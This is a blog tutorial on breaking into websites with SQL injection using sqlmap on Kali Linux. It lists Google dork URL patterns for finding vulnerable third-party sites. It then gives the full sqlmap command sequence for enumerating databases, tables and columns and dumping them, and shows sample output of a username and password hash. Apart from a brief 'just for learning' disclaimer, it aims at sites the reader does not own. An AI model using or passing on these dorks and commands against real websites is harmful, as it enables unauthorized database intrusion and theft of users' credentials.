Blogmagz.com - SQL Injection is one way of hacking where an attacker can easily enter SQL commands through URLs that can be executed by the database. Why did it happen? The existence of this gap is a variable that is less filtered, so hackers can easily get data such as usernames and passwords from the website they are targeting.
SQLMAP itself is an open source penetration tool to test & automate the detection process and then can exploit SQL injection weaknesses and take over database servers. So after we know about the clarity of SQLi, just practice How to Hack Websites with SQL injection Kali Linux.
Hack Website with SQL injection Kali Linux
The first step you have to do is to find a target website that has sql injection vulnerabilities by being able to use the google / bing dork that we provide.
news_view.php?id=
select_biblio.php?id=
humor.php?id=
aboutbook.php?id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
pages.php?id=
announce.php?id=
clanek.php4?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
viewphoto.php?id=
article.php?id=
play_old.php?id=
To get a good dork, you have to come up with your own ideas. Well how? We have created an article that you can read as a reference.
Then on the linux terminal input this command
sqlmap -u http://target.com/contoh.php?id=1 --dbs
You can change the target website according to the website you have obtained from the dork search that has sql injection bugs as above.
Next press enter and wait until sqlmap gets the target database information will usually take time depending also on the connection you use, after that you will get the target database & the next step displays database tables with typing commands.
sqlmap -u http://target.com/contoh.php?id=1 -D namadatabase --tables
After that press enter and wait a while until sqlmap gets tables from the database of the website if it is then it will appear tables database website the next step we run the command to find out the contents of the columns of the database tables with the command
sqlmap -u http://target.com/contoh.php?id=1 -D namadatabase -T namatables --columns
Wait a minute until sqlmap appears data columns from the database tables of the website after getting the database columns, the last step you just need to dump the data columns with typing commands.
sqlmap -u http://website-target.com/contoh.php?id=1 -D namadatabase -T namatables -C namacolumn,namacolumn2 --dump
And wait until sqlmap successfully Dump data columns database target website after completion then you will get the web data. More or less as below:
+--------------------------+----------------------------------+
| uname | Pass
+-------------------------+-----------------------------------+
| 210cf7aa5e2682c9c9d4511f88fe2789 | 8be3c943b1609fffbfc51aad666d0a04adf83c9d
+-------------------------+-----------------------------------+
As explained above, if you want to get a lot of vuln websites. You have to find a dork idea. Share about Sql Injection With SQLMAP Kali Linux is just for learning and please don't abuse it. So many tutorials this time hopefully useful.